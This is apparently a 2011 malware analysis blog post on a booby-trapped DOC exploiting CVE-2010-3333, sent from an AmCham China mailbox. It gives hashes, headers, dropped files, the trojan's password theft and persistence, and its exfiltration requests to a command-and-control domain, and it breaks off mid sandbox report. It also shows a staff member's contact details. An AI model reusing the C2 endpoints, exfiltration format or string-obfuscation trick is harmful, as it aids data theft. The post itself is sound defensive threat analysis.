Jan 6 CVE-2010-3333 DOC with info theft trojan from the American Chamber of Commerce

Common Vulnerabilities and Exposures (CVE)number

CVE-2010-3333
Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability

Please read a technical analysis of this vulnerability on the Microsoft Threat Research & Response Blog Targeted attacks against recently addressed Microsoft Office vulnerability (CVE-2010-3333/MS10-087)  29 Dec 2010 12:10 PM

This particular exploit was tested on and successfully exploits Office 2003 and 2007 without the patch.

  General File Information

File  Three Big Risks to China's Economy In 2011.doc
MD5  5A0AAC44DDAAD1E512A0D505C217BAFF
SHA1 ab6f90bf582bf01985989c1e9a99932243402479
File size :51643
Type:  DOC
Distribution: Email attachment                            

Download

Download Three Big Risks to China's Economy In 2011.doc 5A0AAC44DDAAD1E512A0D505C217BAFF and the created files listed below as a password protected archive (contact me if you need the password)

Download Joe Box Report for binary sandbox analysis on Windows 7 (with pcap files and screenshots, no password on zip)

Download Joe Box Report for binary sandbox analysis on Windows XP (with pcap files and screenshots, no password on zip)

Download  114.248.83.92userinitJan7-11pm.pcap 

Download 123.120.107.46userinitbeforeJan710pm.pcap

Download the Anubis generated pcap file 

Malware Information

The message came from the American Chamber of Commerce in China. The interesting thing about this message is that the sender is not spoofed and the headers are real, which means that the message indeed came from the mailbox of the sender @amchamchina.org, who also happens to be a real person working at amchamchina.org - can be easily found in Google searches. The sender name and address do not match the message signature.  I have removed part of the sender's name for privacy reasons.

In this case, there are three possible scenarios:

a) someone broke into that employee mailbox and sent the malicious message (in this case, I hope the IT staff at the American Chamber of Commerce in China see this post and fix the problem)
b) the sender sent a malicious attachment not realizing it is malicious (less likely, as the attached Word document does not display readable text),
c) the sender sent the malicious message on purpose (..)
We may never know how that happened but hope it is a case of a mailbox password compromise.

 The files created by the malicious attachment generate traffic to a server in China.

Upon opening, the file will dispay garbage text if the attack fails (fully patched MS Office) and will just close without displaying any document if the exploit is successful.

The trojan that gets installed is designed for stealing information from the infected computer - files and passwords - see the detailed analysis below.

read more...

Original Message

From: SXXX WXXXXX [mailto:XXXXX@amchamchina.org]
Sent: Thursday, January 06, 2011 8:46 PM
To: XXXXXXXXXXX
Subject: Three Big Risks to China's Economy In 2011

Dear XXXXX:

Please kindly find the attachment for your need.

If you have any question please let me know.

Best regards,

Ulan Tuya         
Senior Communications Manager     
86-10-8519-0835       
utuya@amchamchina.org


***************************
AmCham-China is a non-partisan and independent non-profit organization representing the interests of some 2,600 companies and individuals doing
business throughout China. Formally recognized by China’s Ministry of Civil Affairs in 1991, AmCham-China is the leader at promoting American
business interests in China. Headquartered in Beijing, with chapters in Central China (Wuhan) Tianjin and Dalian, the Chinese government recognizes
AmCham-China as America’s official chamber of commerce. 

Message Headers

Received: (qmail 12375 invoked from network); 7 Jan 2011 01:46:31 -0000
Received: from mail.amchamchina.org (HELO amcham.amchamchina.org) (122.200.77.250)
  by XXXXXXXXXXXXXXXX with RC4-SHA encrypted SMTP; 7 Jan 2011 01:46:31 -0000
Received: from AMCMAIL.amchamchina.org ([122.200.77.246]) by
 amcham.amchamchina.org ([122.200.77.250]) with mapi; Fri, 7 Jan 2011 09:48:21
 +0800
From: SXXX WXXX
To: XXXXXXXXXXXXXX
Date: Fri, 7 Jan 2011 09:46:17 +0800
Subject: Three Big Risks to China's Economy In 2011
Thread-Topic: Three Big Risks to China's Economy In 2011
Thread-Index: AQHLrgx3tarISKEiT0OWHRNyijQ+D5PEvUAO
Message-ID: <146350E596927B48A9D8F7B0464B167F1762C211CB@AMCMAIL.amchamchina.org>
References: <146350E596927B48A9D8F7B0464B167F1762C211CA@AMCMAIL.amchamchina.org>
In-Reply-To: <146350E596927B48A9D8F7B0464B167F1762C211CA@AMCMAIL.amchamchina.org>
Accept-Language: zh-CN, en-US
Content-Language: zh-CN
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
acceptlanguage: zh-CN, en-US
x-tm-as-product-ver: SMEX-8.0.0.4125-6.500.1024-17878.000
x-tm-as-result: No--40.303000-0.000000-31
x-tm-as-user-approved-sender: Yes
x-tm-as-user-blocked-sender: No
Content-Type: multipart/mixed;
    boundary="_004_146350E596927B48A9D8F7B0464B167F1762C211CBAMCMAILamcham_"
MIME-Version: 1.0

Sender

IP Information for 122.200.77.250

IP Location:	China Beijing Beijing Heju Shuzi Telecom Engineering Co.ltd
Resolve Host:	mail.amchamchina.org
IP Address:	122.200.77.250

inetnum:        122.200.64.0 - 122.200.127.255
netname:        LTEL
descr:          LONGTEL NETWORKS & TECHNOLOGIES LTD.
descr:          Room 601£¬Block B£¬Thunis Development Building
descr:          No.11 HuiXin East Street,Chaoyang District,
descr:          Beijing,100029,P.R.C.
changed:         20080324
source:         APNIC


person:         Wang Dan
nic-hdl:        WD501-AP
e-mail:         
address:        LONGTEL NETWORKS & TECHNOLOGIES LTD.
address:        Room 601 Block B Thunis Development Building
address:        No.11 HuiXin East Street,
address:        Chaoyang District,Beijing,100029,P.R.C.
phone:          +86-10-64823381
fax-no:         +86-10-64823885
country:        CN
changed:         20070910
mnt-by:         MAINT-NEW
source:         APNIC


person:         Ren Weidong
nic-hdl:        RW432-AP
e-mail:         
address:        LONGTEL NETWORKS & TECHNOLOGIES LTD.
address:        Room 601 Block BThunis Development Building
address:        No.11 HuiXin East Street,
address:        Chaoyang District,Beijing,100029,P.R.C.
phone:          +86-10-64823381
fax-no:         +86-10-64823885
country:        CN
changed:         20070910
mnt-by:         MAINT-NEW
source:         APNIC

Automated Scans

File name: Three Big Risks to China's Economy In 2011.doc
http://www.virustotal.com/file-scan/report.html?id=dc1e0b63020d586526320c0bc0f44862ba34f84fb4697e13037d3d4ff54718a1-1294403371Submission date: 2011-01-07 12:29:31 (UTC)
Result: 7 /43 (16.3%)
Avast 4.8.1351.0 2011.01.06 RTF:CVE-2010-3333
Avast5 5.0.677.0 2011.01.06 RTF:CVE-2010-3333
ClamAV 0.96.4.0 2011.01.07 BC.Exploit.CVE_2010_3333
GData 21 2011.01.07 RTF:CVE-2010-3333  
McAfee 5.400.0.1158 2011.01.07 Exploit-CVE2010-3333
Microsoft 1.6402 2011.01.07 Exploit:Win32/CVE-2010-3333
Sophos 4.61.0 2011.01.07 Exp/20103333-A
MD5   : 5a0aac44ddaad1e512a0d505c217baff
SHA1  : ab6f90bf582bf01985989c1e9a99932243402479
SHA256: dc1e0b63020d586526320c0bc0f44862ba34f84fb4697e13037d3d4ff54718a1
ssdeep: 768:vAL60V502HFUDmGIFmwFrKBqQA7bzmqhe6XQKOWM2xs/gSdlY:vS60V6BhIE8rKAQWzS6gK
OWeIl
File size : 51643 bytes
First seen: 2011-01-07 12:29:31
Last seen : 2011-01-07 12:29:31
Magic: Rich Text Format data, version 1, unknown character set
TrID:
Rich Text Format (100.0%)

Files Created

File: userinit.exe
Size: 49664
MD5:  20DD4DD02C2B17A40B26843AA0C660F6
Virustotal
File name: userinit.exe
Submission date: 2011-01-07 12:37:11 (UTC)
Result: 6 /42 (14.3%)
Avast 4.8.1351.0 2011.01.07 Win32:Malware-gen
Avast5 5.0.677.0 2011.01.06 Win32:Malware-gen
DrWeb 5.0.2.03300 2011.01.07 Trojan.MulDrop1.47445
F-Secure 9.0.16160.0 2011.01.07 Gen:Trojan.Heur.LP.cu5@a8zokfo
GData 21 2011.01.07 Win32:Malware-gen
Jiangmin 13.0.900 2011.01.07 Trojan/Genome.epw
MD5   : 20dd4dd02c2b17a40b26843aa0c660f6


 File: userinit.dll
http://www.virustotal.com/file-scan/report.html?id=40aecc6024f83fa2f7b1fdc0b0bcb765d32c62a0b6909dd1ab4821b1f3c64d3f-1294426448
Size: 40960
MD5:  DC574F47A55E022C32A12F55EEC16CC7
 File name: userinit.dll
Submission date: 2011-01-07 18:54:08 (UTC)
Result: 7 /43 (16.3%)
Avast 4.8.1351.0 2011.01.07 Win32:Malware-gen
Avast5 5.0.677.0 2011.01.07 Win32:Malware-gen
BitDefender 7.2 2011.01.07 Gen:Trojan.Heur.LP.cu4@a8zokfo
Comodo 7327 2011.01.07 TrojWare.Win32.PSW.Delf.~JHN
F-Secure 9.0.16160.0 2011.01.07 Gen:Trojan.Heur.LP.cu4@a8zokfo
GData 21 2011.01.07 Gen:Trojan.Heur.LP.cu4@a8zokfo
Panda 10.0.2.7 2011.01.07 Suspicious file
MD5   : dc574f47a55e022c32a12f55eec16cc7

Created files
C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.dll     MD5:  DC574F47A55E022C32A12F55EEC16CC7
C:\Documents and Settings\mila\Local Settings\Application Data\Windows\userinit.exe     MD5:  20DD4DD02C2B17A40B26843AA0C660F6
C:\Documents and Settings\mila\Start Menu\Programs\Startup\userinit.exe             MD5:  20DD4DD02C2B17A40B26843AA0C660F6
C:\Documents and Settings\All Users\Application Data\desktop.BIN ``            MD5:  20DD4DD02C2B17A40B26843AA0C660F6

Userinit.exe additional information

I want to thank  Andre' M. DiMino of the Shadowserver Foundation  and villy of Bugix Security for their help and information

See Anubis and Joe box reports for more details. Here are a few notes:

1. I did not observe any changes in registry . The persistence is achieved via relaunching the binary from  the infected user startup folder (Start Menu\Programs\Startup\userinit.exe), also the there is a copy of the file gets created as All Users\Application Data\desktop.BIN
2. Userinit.exe creates  folder logs in %userprofile%\Local Settings\Application Data\Windows\Logs. A shortcut like in the image below shows up in that directory for a split second but I did not capture it. This is the file that gets transmitted with HTTP POST, M​DAwMGhIR​UwuMDk in meta part of the URL string can be decoded as meta=0000hHEL.09
   

   **POST /wi​ndowsupd​atev7/se​arch%3Fh​l%3DSABB​AE4AUwA%​3D%26q%3​DMQA5ADI​ ALgAxADY​AOAAuADI​ALgAyAA%​3D%3D%26​meta%3DM​DAwMGhIR​UwuMDk%3​D%26id%3​ Dlfdxfir​cvscxggb​ HTTP/1.​1. 
   

   The last part -lfdxfir​cvscxggb​ - is changing with each GET request and is possibly an encoded directories names on the victim pc (thanks to Villy for the info here)
   
3. See the Ascii strings below -. It appears the binary gathers the system info (Sysinfo.txt file gets created and deleted), IP address, and user name for transmission to the remote server. The listing of file extensions (.doc.xls.pdf.rtf.eml.pgp.vpn.wab.csv.docx.xlsx + **Proxy info****Office info***IE info****Hotfix info****OS info**)  is interesting. We did not observe any file transmissions but possibly obtaining the files with the listed extensions is the end goal of the attackers.
4. Villy provided the following info

"some strings encoded using simple encoding to bypass static analysis by AV
to decode strings used the following aglorithm
for(i=0;i
it's means that every byte in the string is decreased by number of its position in the string
userinit.dll - is a service
and installed with svchost(SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost

 It also grabs protected storage -saved passwords from IE 6.0 and below), and saved outlook passwords, versions of MS Office and Internet Explorer

5. Hooks userinit.dll into explorer.exe (only Explorer.exe for Windows XP box despite a large number of apps open and processes running) and into multiple processes (observed on Windows 7 box

 Windows XP

Windows 7

 

Note the html code of the page displayed upon visiting http://globalization.interiorgov.net/windowsupdatev7

    can be seen in the Ascii Strings of the binary
..div align="center"..Under Construction
..div align="center"..;www.microsoft.com

Ascii strings (partial) userinit.exe
Unicode Strings: --------------------------------------------------------------------------- globalization.interiorgov.net globalization.interiorgov.net explorer.exe globalization.interiorgov.net \wininit32.exe \desktop.BIN %s\userinit.dll %s\userinit.exe %s\logs\ %s\Windows %s\%s nsystem Open > nul /c del COMSPEC .doc .xls .pdf .rtf .eml .pgp .vpn .wab .csv .txt .docx .xlsx **Proxy info** **Office info** **IE info** **Hotfix info** **OS info** Microsoft Win32s ...... **Filelist info** %-24s %-8s %-10s %-24s%s State Local address Remote address DELETE_TCB TIME_WAIT LAST_ACK CLOSING CLOSE_WAIT FIN_WAIT2 FIN_WAIT1 ESTAB SYN_RCVD SYN_SENT LISTEN CLOSED Interfaces: %lu **Ip info** 0x%08X %d.%d Windows NT Unknown %-16s %d.%d.%d.%d %-24s%-16s%-16s%-8s%s Name Platform Type **Netview info** Item on **Netshare info** %s.%02d.lnk %04d %s%s SysInfo.txt Mcafee FrameWork :( _uni ... .... <div align="center"><span class="style1">Under Construction</span></div> <div align="center"><span class="style2">www.microsoft.com</span></div> ... ... %s*.* \userinit.exe \winupdate\ \apppatch ServiceDll Parameters netsvcs BITS .dat pstorec.dll advapi32.dll Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) POST Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) wininet VS_VERSION_INFO

Joe Box analysis  report (thanks to Andre' M. DiMino) userinit.exe 

Download Joe Box Report for binary sandbox analysis on Windows 7

Download Joe Box Report for binary sandbox analysis on Windows XP

Anubis scan report userinit.exe

http://anubis.iseclab.org/?action=result&task_id=11c167a3ff87c2e24fd3e993d65ae2aae

[#############################################################################] Analysis Report for userinit.exe MD5: 20dd4dd02c2b17a40b26843aa0c660f6 [#############################################################################] Summary: - Changes security settings of Internet Explorer: This system alteration could seriously affect safety surfing the World Wide Web. - Performs File Modification and Destruction: The executable modifiesand destructs files which are not temporary. - Spawns Processes: The executable produces processes during the execution. - Performs Registry Activities: The executable reads and modifies registry values. It also creates and monitors registry keys. [=============================================================================] Table of Contents [=============================================================================] - General information - userinit.e.exe a) Registry Activities b) File Activities c) Process Activities - cmd.exe a) Registry Activities b) File Activities [#############################################################################] 1. General Information [#############################################################################] [=============================================================================] Information about Anubis' invocation [=============================================================================] Time needed: 92 s Report created: 01/07/11, 18:48:51 UTC Termination reason: All tracked processes have exited Program version: 1.74.3362 [=============================================================================] Global Network Activities [=============================================================================] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] DNS Queries: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Name: [ globalization.interiorgov.net ], Query Type: [ DNS_TYPE_A ], Query Result: [ 123.120.107.46 ], Successful: [ 1 ], Protocol: [ udp ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] HTTP Conversations: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] From ANUBIS:1038 to 123.120.107.46:80 - [ globalization.interiorgov.net ] Request: [ GET /windowsupdatev7/search?hl=UABDAA==&q=MQA5ADIALgAxADYAOAAuADAALgAyAA==&meta=Lg==&id=phqghumeaylnlfd ], Response: [ 200 "OK" ] From ANUBIS:1039 to 123.120.107.46:80 - [ globalization.interiorgov.net ] Request: [ GET /windowsupdatev7/search?hl=UABDAA==&q=MQA5ADIALgAxADYAOAAuADAALgAyAA==&meta=Li4=&id=xfircvscxggbwkf ], Response: [ 200 "OK" ] [#############################################################################] 2. userinit.e.exe [#############################################################################] [=============================================================================] General information about this executable [=============================================================================] Analysis Reason: Primary Analysis Subject Filename: userinit.e.exe MD5: 20dd4dd02c2b17a40b26843aa0c660f6 SHA-1: d0931bc4e7f12dbae2c1d492acc5920134f4b166 File Size: 49664 Bytes Command Line: "C:\userinit.e.exe" Process-status at analysis end: dead Exit Code: 0 [=============================================================================] Load-time Dlls [=============================================================================] Module Name: [ C:\WINDOWS\system32\ntdll.dll ], Base Address: [0x7C900000 ], Size: [0x000AF000 ] Module Name: [ C:\WINDOWS\system32\kernel32.dll ], Base Address: [0x7C800000 ], Size: [0x000F6000 ] Module Name: [ C:\WINDOWS\system32\MSVCRT.dll ], Base Address: [0x77C10000 ], Size: [0x00058000 ] Module Name: [ C:\WINDOWS\system32\USER32.dll ], Base Address: [0x7E410000 ], Size: [0x00091000 ] Module Name: [ C:\WINDOWS\system32\GDI32.dll ], Base Address: [0x77F10000 ], Size: [0x00049000 ] Module Name: [ C:\WINDOWS\system32\iphlpapi.dll ], Base Address: [0x76D60000 ], Size: [0x00019000 ] Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ], Base Address: [0x77DD0000 ], Size: [0x0009B000 ] Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ], Base Address: [0x77E70000 ], Size: [0x00092000 ] Module Name: [ C:\WINDOWS\system32\Secur32.dll ], Base Address: [0x77FE0000 ], Size: [0x00011000 ] Module Name: [ C:\WINDOWS\system32\WS2_32.dll ], Base Address: [0x71AB0000 ], Size: [0x00017000 ] Module Name: [ C:\WINDOWS\system32\WS2HELP.dll ], Base Address: [0x71AA0000 ], Size: [0x00008000 ] Module Name: [ C:\WINDOWS\system32\SHELL32.dll ], Base Address: [0x7C9C0000 ], Size: [0x00817000 ] Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ], Base Address: [0x77F60000 ], Size: [0x00076000 ] Module Name: [ C:\WINDOWS\system32\NETAPI32.dll ], Base Address: [0x5B860000 ], Size: [0x00055000 ] Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ], Base Address: [0x773D0000 ], Size: [0x00103000 ] Module Name: [ C:\WINDOWS\system32\comctl32.dll ], Base Address: [0x5D090000 ], Size: [0x0009A000 ] [=============================================================================] Run-time Dlls [=============================================================================] Module Name: [ C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll ], Base Address: [0x10000000 ], Size: [0x0002B000 ] Module Name: [ C:\WINDOWS\system32\MPR.dll ], Base Address: [0x71B20000 ], Size: [0x00012000 ] Module Name: [ C:\WINDOWS\system32\SAMLIB.dll ], Base Address: [0x71BF0000 ], Size: [0x00013000 ] Module Name: [ C:\WINDOWS\system32\MSCTF.dll ], Base Address: [0x74720000 ], Size: [0x0004C000 ] Module Name: [ C:\WINDOWS\system32\CLBCATQ.DLL ], Base Address: [0x76FD0000 ], Size: [0x0007F000 ] Module Name: [ C:\WINDOWS\system32\COMRes.dll ], Base Address: [0x77050000 ], Size: [0x000C5000 ] Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ], Base Address: [0x77120000 ], Size: [0x0008B000 ] Module Name: [ C:\WINDOWS\system32\WININET.dll ], Base Address: [0x771B0000 ], Size: [0x000AA000 ] Module Name: [ C:\WINDOWS\system32\ole32.dll ], Base Address: [0x774E0000 ], Size: [0x0013D000 ] Module Name: [ C:\WINDOWS\system32\SETUPAPI.dll ], Base Address: [0x77920000 ], Size: [0x000F3000 ] Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ], Base Address: [0x77A80000 ], Size: [0x00095000 ] Module Name: [ C:\WINDOWS\system32\MSASN1.dll ], Base Address: [0x77B20000 ], Size: [0x00012000 ] Module Name: [ C:\WINDOWS\system32\Apphelp.dll ], Base Address: [0x77B40000 ], Size: [0x00022000 ] Module Name: [ C:\WINDOWS\system32\VERSION.dll ], Base Address: [0x77C00000 ], Size: [0x00008000 ] Module Name: [ C:\WINDOWS\system32\urlmon.dll ], Base Address: [0x7E1E0000 ], Size: [0x000A2000 ] [=============================================================================] 2.a) userinit.e.exe - Registry Activities [=============================================================================] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Registry Values Modified: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], Value Name: [ Common AppData ], New Value: [ C:\Documents and Settings\All Users\Application Data ] Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], Value Name: [ Common Desktop ], New Value: [ C:\Documents and Settings\All Users\Desktop ] Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], Value Name: [ Common Documents ], New Value: [ C:\Documents and Settings\All Users\Documents ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a1094da8-30a0-11dd-817b-806d6172696f}\ ], Value Name: [ BaseClass ], New Value: [ Drive ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a1094daa-30a0-11dd-817b-806d6172696f}\ ], Value Name: [ BaseClass ], New Value: [ Drive ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], Value Name: [ Cache ], New Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], Value Name: [ Cookies ], New Value: [ C:\Documents and Settings\Administrator\Cookies ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], Value Name: [ Desktop ], New Value: [ C:\Documents and Settings\Administrator\Desktop ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], Value Name: [ Local AppData ], New Value: [ C:\Documents and Settings\Administrator\Local Settings\Application Data ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ], Value Name: [ Personal ], New Value: [ C:\Documents and Settings\Administrator\My Documents ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ], Value Name: [ IntranetName ], New Value: [ 1 ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ], Value Name: [ ProxyBypass ], New Value: [ 1 ] Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ], Value Name: [ UNCAsIntranet ], New Value: [ 1 ] [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Registry Values Read: [=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=] Key: [ HKLM\SOFTWARE\CLASSES\.ASP ], Value Name: [ ], Value: [ aspfile ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\.BAT ], Value Name: [ ], Value: [ batfile ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\.CER ], Value Name: [ ], Value: [ CERFile ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\.CHM ], Value Name: [ ], Value: [ chm.file ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\.CMD ], Value Name: [ ], Value: [ cmdfile ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\.COM ], Value Name: [ ], Value: [ comfile ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\.CPL ], Value Name: [ ], Value: [ cplfile ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\.CRT ], Value Name: [ ], Value: [ CERFile ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\.EXE ], Value Name: [ ], Value: [ exefile ], 3 times Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\INPROCSERVER32 ], Value Name: [ ], Value: [ %SystemRoot%\system32\SHELL32.dll ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\INPROCSERVER32 ], Value Name: [ ], Value: [ C:\WINDOWS\system32\urlmon.dll ], 2 times Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\INPROCSERVER32 ], Value Name: [ ThreadingModel ], Value: [ Both ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\CLSID\{AEB6717E-7E19-11D0-97EE-00C04FD91972}\INPROCSERVER32 ], Value Name: [ ], Value: [ shell32.dll ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\DIRECTORY ], Value Name: [ AlwaysShowExt ], Value: [ ], 1 time Key: [ HKLM\SOFTWARE\CLASSES\DRIVE\SHELLEX\FOLDEREXTENSIONS\{FBEB8A05-BEEE-4442-804E-409D6C4515E9} ], Value Name: [ DriveMask ], Value: [ 32 ], 2 times Key: [ HKLM\SOFTWARE\CLASSES\EXEFILE\SHELL\OPEN\COMMAND ], Value Name: [ ], Value: [ "%1" %* ], 2 times Key: [ HKLM\SOFTWARE\Microsoft\CTF\SystemShared\ ], Value Name: [ CUAS ], Value: [ 0 ], 1 time Key: [ HKLM\SYSTEM\CurrentControlSet\Control\Session Manager ], Value Name: [ CriticalSectionTimeout ], Value: [ 2592000 ], 1 time Key: [ HKLM\SYSTEM\Setup ], Value Name: [ OsLoaderPath ], Value: [ \ ], 2 times Key: [ HKLM\SYSTEM\Setup ], Value Name: [ SystemPartition ], Value: [ \Device\HarddiskVolume1 ], 2 times Key: [ HKLM\SYSTEM\Setup ], Value Name: [ SystemSetupInProgress ], Value: [ 0 ], 1 time Key: [ HKLM\SYSTEM\WPA\MediaCenter ], Value Name: [ Installed ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Microsoft\COM3 ], Value Name: [ Com+Enabled ], Value: [ 1 ], 2 times Key: [ HKLM\Software\Microsoft\COM3 ], Value Name: [ REGDBVersion ], Value: [ 0x0700000000000000 ], 2 times Key: [ HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS ], Value Name: [ * ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL ], Value Name: [ * ], Value: [ 1 ], 1 time Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion ], Value Name: [ DevicePath ], Value: [ %SystemRoot%\inf ], 1 time Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks ], Value Name: [ {AEB6717E-7E19-11d0-97EE-00C04FD91972} ], Value: [ ], 1 time Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Common AppData ], Value: [ %ALLUSERSPROFILE%\Application Data ], 1 time Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Common Desktop ], Value: [ %ALLUSERSPROFILE%\Desktop ], 1 time Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ], Value Name: [ Common Documents ], Value: [ %ALLUSERSPROFILE%\Documents ], 1 time Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ], Value Name: [ DriverCachePath ], Value: [ %SystemRoot%\Driver Cache ], 2 times Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ], Value Name: [ LogLevel ], Value: [ 0 ], 2 times Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ], Value Name: [ ServicePackCachePath ], Value: [ c:\windows\ServicePackFiles\ServicePackCache ], 2 times Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ], Value Name: [ ServicePackSourcePath ], Value: [ D:\ ], 2 times Key: [ HKLM\Software\Microsoft\Windows\CurrentVersion\Setup ], Value Name: [ SourcePath ], Value: [ D:\ ], 2 times Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], Value Name: [ AuthenticodeEnabled ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], Value Name: [ DefaultLevel ], Value: [ 262144 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], Value Name: [ PolicyScope ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ], Value Name: [ TransparentEnabled ], Value: [ 1 ], 3 times Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ], Value Name: [ HashAlg ], Value: [ 32771 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ], Value Name: [ ItemData ], Value: [ 0x5eab304f957a49896a006c1c31154015 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ], Value Name: [ ItemSize ], Value: [ 779 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ], Value Name: [ SaferFlags ], Value: [ 0 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ], Value Name: [ HashAlg ], Value: [ 32771 ], 1 time Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ], Value Name: [ ItemData ], Value: [ 0x67b0d48b343a3fd3bce9dc646704f394 ], 1 time Key: [ 